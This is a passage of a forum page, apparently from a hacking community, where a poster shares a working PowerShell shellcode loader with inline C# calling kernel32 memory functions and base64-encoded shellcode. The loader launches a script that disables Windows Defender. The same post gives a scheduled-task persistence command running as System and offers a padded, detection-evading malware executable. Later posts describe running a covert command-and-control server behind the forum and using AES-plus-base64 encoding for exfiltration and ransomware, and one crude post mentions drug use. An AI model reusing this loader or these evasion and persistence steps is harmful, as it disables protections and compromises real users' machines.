|| shExpMatch(url, "*redir.metaservices.microsoft.com*")
|| shExpMatch(url, "*reports.wes.df.telemetry.microsoft.com*")
|| shExpMatch(url, "*cs1.wpc.v0cdn.net*")
|| shExpMatch(url, "*corpext.msitadfs.glbdns2.microsoft.comt*")
|| shExpMatch(url, "*df.telemetry.microsoft.com*")
|| shExpMatch(url, "*services.wes.df.telemetry.microsoft.com*")
|| shExpMatch(url, "*watson.telemetry.microsoft.com.nsatc.net*")
|| shExpMatch(url, "*sqm.telemetry.microsoft.com*")
|| shExpMatch(url, "*sqm.telemetry.microsoft.com.nsatc.net*")
|| shExpMatch(url, "*watson.ppe.telemetry.microsoft.com*")
|| shExpMatch(url, "*telemetry.microsoft.com*")
|| shExpMatch(url, "*telemetry.urs.microsoft.com*")
|| shExpMatch(url, "*survey.watson.microsoft.com*")
|| shExpMatch(url, "*watson.live.com*")
|| shExpMatch(url, "*vortex-sandbox.data.microsoft.com*")
|| shExpMatch(url, "*settings-win.data.microsoft.com*")
|| shExpMatch(url, "*watson.microsoft.com*")
|| shExpMatch(url, "*db3aqu.atdmt.com*")
|| shExpMatch(url, "*diagnostics.support.microsoft.com*")
|| shExpMatch(url, "*statsfe2.update.microsoft.com.akadns.net*")
|| shExpMatch(url, "*fe2.update.microsoft.com.akadns.net*")
|| shExpMatch(url, "*schemas.microsoft.akadns.net*")
|| shExpMatch(url, "*feedback.microsoft-hohm.com*")
|| shExpMatch(url, "*feedback.search.microsoft.com*")
|| shExpMatch(url, "*statsfe1.ws.microsoft.com*")
|| shExpMatch(url, "*statsfe1.ws.microsoft.com*")
|| shExpMatch(url, "*c.atdmt.com*")) {
// This list may be incomplete and/or slightly outdated
// TODO: Fix that
return blackhole;
} else {
return normal;
}
}
</script>
For a perfectly adequate blackhole server, pip has you covered. If you have the Python interpreter and pip installed you can use the following commands to grab the server in question.
pip install tcp_blackhole
Easy. When you're invoking the script either through 'python -m tcp_blackhole.py' or by calling it from a different script/utility make sure the argument for http mode is set to True. And set the port argument to 55555. So that it's commensurate with the PAC Script
To persist this state of affairs once everything is in place, another scheduled task may be in order.
schtasks /create /tn 'StageProxyOps' /tr powershell %WINDIR%\HTTP-Proxy-Server.ps1 /sc onstart /ru System
Which reminds me, if you want to try something a little more pro-active with regards to the script that kill WinDefender i generated the following
Set-StrictMode -Version 2
$dQA = @"
using System;
using System.Runtime.InteropServices;
namespace c5qI1 {
public class func {
[Flags] public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 }
[Flags] public enum MemoryProtection { ReadWrite = 0x04, Execute= 0x10 }
[Flags] public enum Time : uint { Infinite = 0xFFFFFFFF }
[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")] public static extern bool VirtualProtect(IntPtr lpAddress, int dwSize, int flNewProtect,out int lpflOldProtect);
[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport("kernel32.dll")] public static extern int WaitForSingleObject(IntPtr hHandle, Time dwMilliseconds);
}
}
"@
$g_ = New-Object Microsoft.CSharp.CSharpCodeProvider
$kp_ = New-Object System.CodeDom.Compiler.CompilerParameters
$kp_.ReferencedAssemblies.AddRange(@("System.dll", [PsObject].Assembly.Location))
$kp_.GenerateInMemory = $True
$qwx = $g_.CompileAssemblyFromSource($kp_, $dQA)
[Byte[]]$gycNB = [System.Convert]::FromBase64String("/OiCAAAAYInlMcBki1Awi1IMi1IUi3IoD7dKJjH/rDxhfAIsIMHPDQHH4vJSV4tSEItKPItMEXjjSAHRUYtZIAHTi0kY4zpJizSLAdYx/6zBzw0BxzjgdfYDffg7fSR15FiLWCQB02aLDEuLWBwB04sEiwHQiUQkJFtbYVlaUf/gX19aixLrjV1qAY2FsgAAAFBoMYtvh//Vu/C1olZoppW9nf/VPAZ8CoD74HUFu0cTcm9qAFP/1XBvd2Vyc2hlbGwgLU5vUCAtZXhlYyBieXBhc3MgLlwlV0lORElSJVx3aW5leGVjMi5wczEA")
[Uint32]$h9koM = 0
$vnJp = [c5qI1.func]::VirtualAlloc(0, $gycNB.Length + 1, [c5qI1.func+AllocationType]::Reserve -bOr [c5qI1.func+AllocationType]::Commit, [c5qI1.func+MemoryProtection]::ReadWrite)
if ([Bool]!$vnJp) { $global:result = 3; return }
[System.Runtime.InteropServices.Marshal]::Copy($gycNB, 0, $vnJp, $gycNB.Length)
if ([c5qI1.func]::VirtualProtect($vnJp,[Uint32]$gycNB.Length + 1, [c5qI1.func+MemoryProtection]::Execute, [Ref]$h9koM) -eq $true ) {
[IntPtr] $yU_ = [c5qI1.func]::CreateThread(0,0,$vnJp,0,0,0)
if ([Bool]!$yU_) { $global:result = 7; return }
$nQ_ = [c5qI1.func]::WaitForSingleObject($yU_, [c5qI1.func+Time]::Infinite)
}
As you can see this powershell script has inline C#, that's to build a special DLL that will mimic kernel32 DLL, but for our ends. Kernel32.dll in short is involved with memory management, I/O, and it's process lives in kernelland. Which is good. A bit further down you can see a Base64 encoded string, this is actually encoded shellcode and we're going to use functions imported from kernel32.dll to inject that shellcode(once decoded) into memory using the CreateRemoteThread Method. Once injected it's going to fire off the equivalent of this command: powershell -NoP -exec bypass -c .\%WINDIR%\windef.ps1.
As you can tell it's going to assume the WinDefKiller script lives in the %WINDIR% and is called windef.ps1. The point being that when done like this you won't be running the script from your user context but it will run in the context of the process doing the invoking.
Anyway i was bored so i made some things i made some stuff to drop the WinDefKiller script in it's expected spot, automatically launch it through the script you see above and on top of that also add a scheduled task. then i put it all together into one big beautiful executable and padded the executable out to the point of low entropy in order to fly under the radar while Windows Defender still lives. It's basically malware, so if you are feeling adventerous shoot me a message and i may send you a precompiled executable. For fully automated Windows Defender murdering madness.
Here's what it looks like on the inside:
Anyway i hope you found all that at least somewhat informative, but mostly useful. I genuinely despise the way Micro$oft goes about these things. Unfortunately I'm gonna have to make a new edition of this thread for Windows 11 pretty soon, i think.The following users say it would be alright if the author of this post didn't die in a fire! -
2022-08-19 at 9:05 AM UTC in just realized there's like at most a dozen active users hereThis whole forum business is just a sideshow. In fact this is an elaborate front for a pretty epic command and control server. Why do you think we had to custom write this bad boy*Slaps Forum* with Python's Django framework? We had to homebrew in order to get the features and functionality required to use the stealth C2 Server. Websites, those with a focus on text are great for this sort of thing.
Generally speaking the victims of a malware operation will have by default a http(Port 80) and TLS(Port 443) connection available to them. For their browsers you see. Even if you don't have an encrypted connection, say you can only have your malware contact the C2 over HTTP, that's still no problem. It's very easy in most programming languages to write a function to encrypt data with AES-256 and then Base64 the result, B64 encoded anything is easy to transport over HTTP/S. Plus maybe you're running a ransomware campaign, the crypto routines double for exfil and target data encryption in that case. Ya dig?The following users say it would be alright if the author of this post didn't die in a fire! -
2022-08-19 at 2:20 PM UTC in I've always wanted to fuck a user of this forum
Originally posted by Sudo But ya I'd meet up with anyone on this website and see where it goes.
Would you do lines of speed and wax philosophical with me all night? If you wanna make it extra gay we could do exactly the same but in a little peddle boat for two shaped like a swan on a lake somewhere.The following users say it would be alright if the author of this post didn't die in a fire!
